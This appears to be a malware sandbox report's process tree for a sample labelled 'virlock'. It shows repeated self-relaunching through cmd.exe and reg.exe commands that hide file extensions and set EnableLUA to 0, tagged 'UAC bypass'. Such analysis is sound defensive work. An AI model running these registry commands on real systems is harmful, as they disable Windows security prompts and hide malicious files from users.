C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"120⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock121⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"122⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1123⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock123⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"124⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock125⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"126⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock127⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"128⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock129⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"130⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock131⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"132⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1133⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock133⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"134⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock135⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"136⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1137⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock137⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"138⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1139⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock139⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"140⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1141⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock141⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"142⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock143⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"144⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1145⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock145⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"146⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock147⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"148⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock149⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"150⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock151⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"152⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1153⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock153⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"154⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock155⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"156⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock157⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"158⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1159⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock159⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"160⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock161⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"162⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1162⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2162⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1163⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f162⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1163⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FsQIwQwY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""162⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1163⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs163⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1160⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1161⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2160⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1161⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f160⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LIMkEcoY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""160⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1161⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs161⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1158⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2158⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1159⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f158⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1159⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UuwwAoAA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""158⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1159⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs159⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1156⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1157⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2156⤵
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1157⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f156⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1157⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ukcocQwI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""156⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1157⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs157⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1154⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1155⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2154⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f154⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1155⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eiYsMsEE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""154⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1155⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs155⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1152⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2152⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f152⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zycIksAM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""152⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1153⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs153⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1150⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1151⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2150⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f150⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1151⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VssMoMAU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""150⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs151⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1148⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2148⤵
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1149⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f148⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TeUkowoY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""148⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs149⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1146⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2146⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f146⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1147⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sesAEMIE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""146⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs147⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1144⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2144⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f144⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qiQEUkQc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""144⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs145⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1142⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2142⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f142⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gaUwQQAk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""142⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs143⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1140⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2140⤵
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1141⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f140⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1141⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DgkgwcgU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""140⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1141⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs141⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1138⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1139⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2138⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1139⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f138⤵
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1139⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jEIUggYo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""138⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs139⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1136⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1137⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2136⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1137⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f136⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1137⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PmcgUMAQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""136⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs137⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1134⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2134⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f134⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EeUgEkIU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""134⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs135⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1132⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2132⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f132⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ikEgEcQw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""132⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1133⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs133⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1130⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2130⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f130⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AukMAUYc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""130⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs131⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1128⤵
- Modifies visibility of file extensions in Explorer
-
